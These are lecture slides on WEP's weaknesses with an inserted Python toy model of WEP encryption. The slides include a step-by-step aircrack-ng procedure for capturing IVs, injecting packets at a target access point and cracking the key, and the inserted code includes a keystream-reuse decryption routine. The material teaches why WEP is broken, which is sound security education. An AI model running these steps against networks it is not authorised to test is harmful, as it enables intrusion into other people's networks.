The Trouble with WEP - Clarkson University (owensjp/pubs/WEP.pdf)
Page 1

The Trouble with WEP

Or, cracking WiFi networks for fun & profit (not really)

Jim Owens

Page 2

Overview

- Background and a little history
- How WEP works
- WEP’s major weaknesses
- A short course in wardriving
  - Using kismet to scout out the wireless landscape
  - Zeroing in with the aircrack-ng suite
    - airodump, to capture traffic
    - aireplay, to replay weakly encrypted packets
    - aircrack, to find the key using statistical methods

Page 3

Background & history…

- Wireless Equivalent Privacy
- Adopted in 1999 as part of 802.11 standard
- Later swallowed whole by 802.11b standard
- Initially, used only 40-bit encryption keys, due to technology export restrictions
- Later, expanded to 104-bit keys when export restrictions were eased
- Used 6 times as often as WPA/WPA2 despite known fatal weakness* (85% / 14% / 1%)

*Based on a 2006 survey in Seattle area

Page 4

How WEP works

- Plain text gets CRC-32 checksum appended
- 24-bit initialization vector pre-pended to key as a seed for RC4 key scheduling algorithm
- RC4’s pseudo-random generation algorithm outputs keystream
- Keystream XORed with plain text
- IV in plain text pre-pended to message
- On receipt, keystream regenerated and XORed with cipher text to produce plain text

Page 5

WEP’s major weaknesses

- IV space too small (2^24)
  - On a busy network, IVs must repeat in <= 5 hours
  - 50% probability that IV repeats in 5,000 packets
- RC4 algorithm produces “weak” IVs that can be correctly guessed 5% or 13% of the time
- No key management; typically just one key
- IP traffic contains much known plaintext data
- Open to injected traffic that is rebroadcast
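Added illustration, not part of the slides: a toy Python model of the WEP encapsulation from page 4 (RC4 seeded with IV || key, CRC-32 integrity check value, IV sent in the clear), followed by two of the page 5 weaknesses made concrete: a repeated IV combined with known plaintext exposes any other frame sent under that IV without the key, and a birthday-bound function reproduces the "50% in 5,000 packets" figure. The little-endian ICV encoding, the 40/104-bit key check and all keys, IVs and messages used in testing are assumptions or constructed values.

```python
import math
import zlib

def rc4_keystream(seed, length):
    """RC4: key-scheduling algorithm (KSA), then pseudo-random generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                               # KSA
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:                           # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(plaintext):
    return zlib.crc32(plaintext).to_bytes(4, "little")  # CRC-32 integrity check value (assumed little-endian)

def wep_encrypt(key, iv, plaintext):
    """Sender: append ICV, XOR with RC4(IV || key), prepend the 24-bit IV in the clear."""
    assert len(iv) == 3 and len(key) in (5, 13)        # 40- or 104-bit key
    body = plaintext + icv(plaintext)
    return iv + xor_bytes(body, rc4_keystream(iv + key, len(body)))

def wep_decrypt(key, frame):
    """Receiver: regenerate keystream from the clear IV, XOR, check ICV (None = reject)."""
    iv, ct = frame[:3], frame[3:]
    body = xor_bytes(ct, rc4_keystream(iv + key, len(ct)))
    plaintext = body[:-4]
    return plaintext if body[-4:] == icv(plaintext) else None

def decrypt_via_reused_iv(frame_known, known_plaintext, frame_other):
    """Keystream reuse: C_known XOR (P_known || ICV) is the keystream for that IV, and
    any other frame under the same IV decrypts with it, no key needed.
    Returns None when the IVs differ; recovers as far as the known keystream reaches."""
    if frame_known[:3] != frame_other[:3]:
        return None
    keystream = xor_bytes(frame_known[3:], known_plaintext + icv(known_plaintext))
    return xor_bytes(frame_other[3:], keystream)[:len(frame_other) - 7]  # len(P_other) = frame - IV - ICV

def iv_collision_probability(packets, iv_bits=24):
    """Birthday bound on at least one repeated IV among `packets` random 24-bit IVs."""
    return 1 - math.exp(-packets * (packets - 1) / (2 * 2 ** iv_bits))
```

Because the ICV is a plain CRC-32 rather than a keyed MAC, the receiver check in wep_decrypt only detects accidental damage; the defence is the one page 17 gives, not to use WEP at all.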

Page 6

Wardriving: Kismet

- Network detector, sniffer, IDS
- Works on 802.11b, 802.11a, 802.11g networks
- Uses passive monitoring, so hard to detect
- Logs sniffed packets in formats compatible with Wireshark/Tcpdump, Airsnort
- Channel surfs automatically
- Optionally, supports GPS for network location

Page 7

Kismet: Install & configure

- Binary packages available for most systems
- Requires WiFi adaptor that supports monitor mode as “capture source”
- Logs traffic in popular formats*
- Specify source in /etc/kismet/kismet.conf, as driver,device,source_name:

  source=ipw2200,eth1,Stella

*Wireshark, Airsnort, etc.

Page 8

Stella, the WiFi attack animal!

Page 9

Wardriving: Recon phase

- Use Kismet to survey WiFi landscape and to choose a target network
- Record necessary data for Aircrack attack:
  - Channel number?
  - SSID?
  - Access point MAC address?

Page 10

Wardriving: Kismet

Page 11

Wardriving: Attack phase

- Aircrack-ng: Software for network detection, sniffing, WEP cracking, and analysis
- Works on 802.11b, 802.11a, 802.11g
- Uses passive monitoring & packet injection
- Main tools:
  - aircrack-ng: Cracking
  - airdecap: Packet decryption
  - airmon: Monitor mode switching
  - aireplay: Packet injection (Linux only)
  - airodump: Exports traffic to .cap files

Page 12

Wardriving: Aircrack procedure

1. Bring up adapter on target’s channel in monitor mode:

   # ifconfig wlan0 up
   # iwconfig wlan0 mode Monitor channel 9

2. Capture packets to file on channel, IVs only:

   # airodump wlan0 ./berlin_dump 9 1

Page 13

Wardriving: Airodump

Page 14

Wardriving: Aircrack procedure

1. Find weakly-encrypted packets to replay in interactive mode:

   # aireplay -2 -b 00:14:6C:40:BA:A6 -x 512 wlan0

2. Finally, crack WEP key with captured IVs:

   # aircrack -n 64 berlin-dump.ivs

Page 15

Wardriving: Aireplay

Page 16

Wardriving: Aircrack

Page 17

Summary

- WEP has numerous serious flaws
- WEP's flaws are thoroughly documented
- WEP is readily exploitable in a short time, by unskilled attackers, using readily available tools
- Strong protection is readily available
- Bottom line: Don't use WEP, period!

Page 18

Questions?